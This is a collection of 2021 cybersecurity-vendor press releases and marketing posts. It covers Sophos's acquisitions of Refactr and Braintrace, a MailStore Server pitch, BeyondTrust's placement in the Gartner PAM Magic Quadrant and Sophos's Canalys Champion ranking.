“I’m excited to share that Sophos has acquired Refactr, which develops and markets a versatile DevSecOps automation platform that bridges the gap between DevOps and cybersecurity,” said John Levy, Sophos Chief Technical Officer.
As DevOps and security teams continue to adopt “IT-as-Code” approaches to managing their environments, Refactr’s ability to automate any of these processes enables teams to scale. Refactr has leading customers in both the private and government/public sectors, including the Center for Internet Security, and the US Air Force’s Platform One.
Sophos is optimizing Refactr’s DevSecOps automation platform to add Security Orchestration Automation and Response (SOAR) capabilities to our Managed Threat Response (MTR) and Extended Detection and Response (XDR) solutions. The SOAR capabilities will also help automate Sophos’ Adaptive Cybersecurity Ecosystem, which underpins all of Sophos’ product solutions, services, and alliance integrations.
First-generation SOAR solutions have moved our industry forward in significant ways, but we’re now witnessing an evolution where more and more businesses are becoming software companies, and our security solutions need to evolve in parallel. As we’ve seen in recent supply-chain incidents, attackers are increasingly targeting software development pipelines, and defenders need the ability to shift further left of attackers. The industry needs SOAR to mature into more capable and generalizable DevSecOps solutions, and Sophos’ acquisition of Refactr will help us lead the way.
With Refactr, Sophos will fast track the integration of such advanced SOAR capabilities into our Adaptive Cybersecurity Ecosystem, the basis for our XDR product and MTR service. We will provide a full spectrum of automated playbooks and pipelines for our customers and partners, from drag-and-drop to fully programmable, along with broad integrations with third-party solutions through our technology alliances program to work with today’s diverse IT environments.
Sophos will continue to develop and offer Refactr’s platform to their existing and growing base of partners and organizations that want to build customized IT and security automations for themselves and for their customers. Refactr’s Community Edition will continue to be available as well.
“We created the Refactr platform so that every organization can achieve DevSecOps through holistic security-first automation. Our platform was purpose-built to be versatile, interoperable and easy to use. We are proud of what we accomplished at Refactr and excited for the next part of our journey with Sophos to help create a more secure world through DevSecOps,” said Michael Fraser, CEO and co-founder, Refactr.
We could not be more excited to add Refactr technologies to the Sophos portfolio and we plan to begin offering SOAR options by early 2022. In the meantime, on behalf of Sophos, I would like to extend a very warm welcome to Refactr employees, customers, and partners.
Source: Sophos
I’m thrilled to announce that Sophos has acquired Braintrace, an innovator in Network Detection and Response (NDR) technology. Braintrace’s NDR provides deep visibility into network traffic patterns, including encrypted traffic, without the need for Man-in-the-Middle (MitM) decryption.
Braintrace’s NDR technology will enhance and extend Sophos’ Managed Threat Response (MTR), Rapid Response, and Extended Detection and Response (XDR) solutions through integration into the Adaptive Cybersecurity Ecosystem, which underpins all Sophos products and services. With the integration of Braintrace, defenders will benefit from an ‘air traffic control system’ that sees all network activity, reveals unknown and unprotected assets, and exposes evasive malware more reliably than Intrusion Protection Systems (IPS).
We’re particularly excited that Braintrace built this technology specifically to provide better security outcomes to their Managed Detection and Response (MDR) customers. It’s hard to beat the effectiveness of solutions built by teams of skilled practitioners and developers to solve real world cybersecurity problems.
The Braintrace technology will also serve as the launchpad to collect and forward third-party event data from firewalls, proxies, virtual private networks (VPNs), and other sources. These additional layers of visibility and event ingestion will significantly improve threat detection, threat hunting and response to suspicious activity.
Sophos will deploy Braintrace’s NDR technology as a virtual machine, fed from traditional observability points such as a Switched Port Analyzer (SPAN) port or a network Test Access Point (TAP) to inspect both north-south traffic at boundaries or east-west traffic within networks. These deployments help discover threats inside any type of network, including those that remain encrypted, serving as a complement to the decryption capabilities of Sophos Firewall. As a virtual machine, Braintrace’s NDR technology can run both on-premises and in the cloud to protect your network.
The technology’s packet and flow engine feeds a variety of machine learning models trained to detect suspicious or malicious network patterns, such as connections to Command and Control (C2) servers, lateral movement and communications with suspicious domains. Since Braintrace built its NDR technology specifically for predictive, passive monitoring, its engine also provides intelligent network packet capture that IT security administrators and threat hunters can use as supporting evidence during investigations. The novel NDR analysis and prediction technique is patent pending.
“We built Braintrace’s NDR technology from the ground up for detection and now, with Sophos, it will fit into a complete system to provide cross-product detection and response across a multi-vendor ecosystem,” said Bret Laughlin, CEO and co-founder, Braintrace.
Sophos plans to introduce Braintrace’s NDR technology for MTR and XDR in the first half of 2022. In the meantime, on behalf of Sophos, I would like to extend a warm welcome to all Braintrace customers, partners and employees.
Source: Sophos
- On the market for over 10 years
- More than 80,000 satisfied customers around the globe already use MailStore Server
- Supports Microsoft Exchange Server, Microsoft 365, and many other email systems
- Supports journal archiving and mailbox archiving
- Fast and easy access for end users, even on mobile devices such as tablets and smartphones
- Versatile export function guarantees independence in the long term, even from MailStore
- Free 30-day trial version available at any time
- Prices start from 295.00 €, incl. a 12-month Update & Support Service
OK, that was a blatant portion of aggressive advertising, sorry for that! But seriously, we believe that for any happy Exclaimer Mail Archiver user, MailStore Server is a very good and suitable alternative.
Well, Here Are a Few Good Options to Find Out if MailStore Server Is the Right Email Archiving Product for Your Needs:
- Read the recent product review done by Microsoft MVP Brien Posey on www.techgenix.com
- Watch our product videos and helpful tech tip videos, as these brief ‘knowledge nuggets’ give you a great technical insight into MailStore Server
- Join one of our regular webinars and enjoy a product live demo
- Give it a try and download our free 30-day-trial
- Need to tick more boxes on your list of technical requirements? Our technical support is happy to fill the blanks.
Source: MailStore
The 2021 Gartner Magic Quadrant for Privileged Access Management has been published, and BeyondTrust is pleased to announce that we have been named a Leader for the third time in a row! According to the research report, “Gartner defines the privileged access management (PAM) market as a foundational security technology to protect accounts, credentials and operations that offer an elevated (“privileged”) level of access.”
This year’s edition of the Magic Quadrant provides an assessment of 10 PAM vendors. Organizations are evaluated across completeness of vision and ability to execute, with the report drilling down across dozens of criteria. You can download a complimentary copy here.
Read on for more highlights and analysis of the report.
PAM Market & Trends
In this year’s report, Gartner sees the PAM market as comprised of the following three distinct tool categories:
- “Privileged account and session management (PASM)
- Privilege elevation and delegation management (PEDM)
- Secrets management”
Gartner calls out these as the core capabilities of PAM:
- “Discovery of privileged accounts across multiple systems, infrastructure, and applications
- Credential management for privileged accounts
- Delegation of access to privileged accounts
- Session establishment, management, monitoring and recording for interactive
- Controlled elevation of commands”
According to Gartner, these are optional PAM capabilities:
- “Secrets management for applications, service, and devices
- Privileged task automation (PTA)
- Remote privileged access for workforce and external users”
Let’s take a closer look at three key trends.
1. PAM continues to be a high priority for security organizations: Gartner states, “The growth is mainly driven by the increasing awareness among security staff regarding criticality of PAM solutions. Several high-profile breaches have been linked to compromised privileged account credentials. Coupled with this, the accelerated migration to cloud, blurring enterprise security perimeters and the overall increase in the number of cyberattacks all contribute to the growth of PAM adoption.”
This aligns with what we’ve seen at BeyondTrust over the past year as organizations continue to adopt and evolve their PAM solutions beyond basic PASM products to include PEDM, Secrets Management, and Privileged Remote Access solutions. We believe BeyondTrust offers the broadest PAM portfolio on the market, with particular strength in PEDM for Windows, Mac, Unix, and Linux.
2. Remote access security becomes increasingly important amid the pandemic. In its companion Critical Capabilities for Privileged Access Management report, Gartner states, “In response to global shutdowns, many privileged access management (PAM) vendors jumped into the remote access business, bringing new products to the market last year, with many focused on remote privileged access.”
Organizations recognize remote access security is a must-have in the new normal of work-from-anywhere (WFA), hybrid work, and accelerated digital transformation. BeyondTrust trailblazed and continues to lead in Secure Remote Access solutions, comprised of mature Privileged Remote Access and Remote Support products, that are years ahead of other PAM vendors in terms of depth and breadth of capabilities.
3. Operational Technology (OT) security in the spotlight: In the PAM Magic Quadrant, Gartner also called out the growing need and demand for extending privileged access management to OT environments. Gartner stated, “Although PAM is typically a horizontal solution, with increasing demand from healthcare, manufacturing and natural resources, an emerging need from a vertical standpoint is for specific features for organizations using the IoT and OT. Examples include companies in the utilities and energy sectors, and hospitals. These organizations need to secure privileged access to their supervisory control and data acquisition (SCADA) and OT devices, and require preconfigured connectors to popular OT systems.”
2021 has already been characterized by some brazen OT attacks, such as the Colonial Pipeline ransomware attack, and the water poisoning attempt on a Florida water treatment facility. BeyondTrust PAM provides a blended approach that could have prevented and mitigated these attacks and others by securing remote access pathways, proactively managing privileged credentials and secrets, and applying least privilege and pragmatic application control across all endpoints and privileged sessions. Over the past year, BeyondTrust has seen a substantive increase in customers adopting and applying our solutions for OT use cases.
The Gartner Magic Quadrant and BeyondTrust PAM
The 2021 Gartner Magic Quadrant for Privileged Access Management recognizes BeyondTrust as a Leader for both our ability to execute and completeness of vision.
In our view, the 2021 Gartner Magic Quadrant for Privileged Access Management validates BeyondTrust’s strengths in the PAM market, including platform breadth, solution depth, integrations, value, and time-to-value. We believe BeyondTrust provides the most complete and integrated solution across the three PAM tool categories recognized by Gartner, as well as delivering deep capabilities across the “core” and “optional” PAM capabilities described in the Gartner report. We invite you to download a complimentary copy of the PAM Magic Quadrant and compare us against the rest of the vendors.
Here are what we believe to be nine differentiators of BeyondTrust PAM:
- Breadth & depth – Unlike most competitors, we deliver deep capabilities across the broadest universe of privileges – whether it’s across Windows, Unix, Linux, macOS, cloud, on-premise, employee, vendor, human, or machine.
- Ease of deployment and scalability – our customers make leaps in risk reduction and operational/administrative improvements, fast.
- Superb account discovery that helps illuminate shadow IT and bring all privileged assets and privileges under control.
- Privilege elevation and delegation (PEDM) features and platform breadth. We believe our PEDM product, called Endpoint Privilege Management, is unparalleled in the space for enforcing least privilege and implementing advanced application control capabilities, such as the Trusted Application Protection capability, which can even protect against fileless attacks. Our product also provides file integrity monitoring for Unix and Linux environments.
- Mature, secure remote access capabilities for supporting internal and third-party users, and locking down access to sensitive assets, such as cloud/DevOps/virtual control planes and other applications.
- Robust out-of-the-box and customizable analytics and reporting.
- Flexible deployment options – choose cloud, hybrid, or on-prem—we support what works best for each of our customers! Many PAM providers offer cloud or on-prem products only.
- A true, integrated PAM platform, with the ability to unlock powerful synergies when multiple BeyondTrust products/solutions are deployed.
- A clear roadmap of PAM innovations
The PAM Magic Quadrant: Today & Beyond
While the Gartner Magic Quadrant offers independent, expert-researched snapshots of the vendor market and PAM landscape, BeyondTrust’s innovation is continuous and relentless. Since the report’s March 2021 product release cut-off date, BeyondTrust has announced several significant product releases, including:
- Cloud Privilege Broker: New solution in CIEM (Cloud Infrastructure Entitlement Management) centralizes visualization and management of entitlements, enabling IT and security teams to apply consistent policies across multicloud environments.
- DevOps Secrets Safe 21.1: Latest version adds integrations and enhances just-in-time access controls, enabling service accounts to be automatically removed from the cloud infrastructure when a ‘time-to-live’ duration is reached, significantly reducing a potential attack vector.
- Password Safe 21.1: New version extends and simplifies privileged credential management to more platforms and offers enhanced integration with BeyondTrust Privilege Management for Windows and Mac.
- Privilege Management for Windows & Mac Cloud 21.5: Latest cloud-based version of the product provides an integration with ServiceNow to streamline workflows for IT-related tickets and privilege elevation requests. This release also enhances reputation-based analytics to further boost malware protection.
- Privileged Remote Access Version 21.1: Latest version delivers a number of improvements, including simplified vendor onboarding features, credential vault enhancements, Raspberry Pi capabilities, extended unattended support use cases, and more.
In addition, BeyondTrust continues to rack up important certifications, demonstrating how our solution and organization go above and beyond.
- ISO 27701 Certification: On June 3rd, 2021, BeyondTrust announced successful completion of the International Organization for Standardization (ISO) 27701 certification for our entire product portfolio for both on-premises and cloud products. Just seven months after achieving ISO 27001 certification, this additional certification demonstrates BeyondTrust’s ongoing commitment to ensure customer data is safe from the most sophisticated methods of intrusion.
- Remote Access Solutions Awarded Level 1 FIPS 140-2 Validation: On April 14th, BeyondTrust announced it had been awarded Level 1 Federal Information Processing Standards (FIPS) 140-2 validation for its Privileged Remote Access product. BeyondTrust now has FIPS 140-2 Level 1 validation for both of our Secure Remote Access solutions: Privileged Remote Access for the first time and renewed validation for Remote Support. BeyondTrust has the only Secure Remote Access solution that meets the rigorous requirements of FIPS 140-2 Level 1, a substantive differentiator in a world that is increasingly moving to hybrid or remote-first workforces.
2021 has been another highly disruptive year, yet BeyondTrust solutions are experiencing record demand to keep our world’s businesses and economies running. We have helped thousands of companies securely adjust to the new priorities and dynamic, shifting work environment since the start of the pandemic.
BeyondTrust PAM solutions work in an integrated way to unify control over your entire privilege universe and drastically reduce your attack surface. We believe our ability to secure every privileged user (human, machine, vendor, employee), asset, and session via our PAM platform poises us as the best PAM solutions provider to partner with as organizations navigate the new normal, and the multiplying planes of privileges.
In a move that highlights Sophos’ channel-best commitment, global analyst research firm Canalys named Sophos a Champion in its 2021 Cybersecurity Leadership Matrix.
Canalys evaluated 17 global cybersecurity vendors for its 2021 Cybersecurity Leadership Matrix, reserving the Champion designation for an exclusive group of vendors with the highest channel scores and a demonstrated commitment to delivering high-performing channel programs.
“Sophos had the highest rise in partner ratings among the cybersecurity vendors analyzed this year, elevating its status to Champion,” said Canalys Chief Analyst, Matthew Ball. “The launch of its new Global Partner Program and its continued focus on accelerating growth with MSPs have contributed to its strong partner feedback.”
The Cybersecurity Leadership Matrix assesses vendor performance in the channel, based on channel feedback via the Candefero Vendor Benchmark over the last 12 months, and an independent analysis of vendors, assessing vision and strategy, portfolio competitiveness, customer coverage, channel business, M&A activities, new product launches, recent channel initiatives launched and future channel initiatives planned. The Candefero Vendor Benchmark tracks leading technology vendors around the world, collating the experiences that channel partners have when working with different vendors. Channel partners are asked to rate their vendors across the 10 most important areas of channel management.
“This is a fantastic achievement and an honor to be recognized by the partner community as a vendor that’s delivering a best-in-class partner program that adapts to the unique needs of today’s next-gen resellers, managed service providers, and cybersecurity experts,” said Kendra Krause, Senior Vice President of Global Channels at Sophos. “Canalys notes that Champions show a willingness to boost growth opportunities and increase profitability for partners and this is absolutely the channel-best commitment we deliver at Sophos.”
More information on the Canalys Global Cybersecurity Leadership Matrix and Sophos’ Champions status can be found here.
Source: Sophos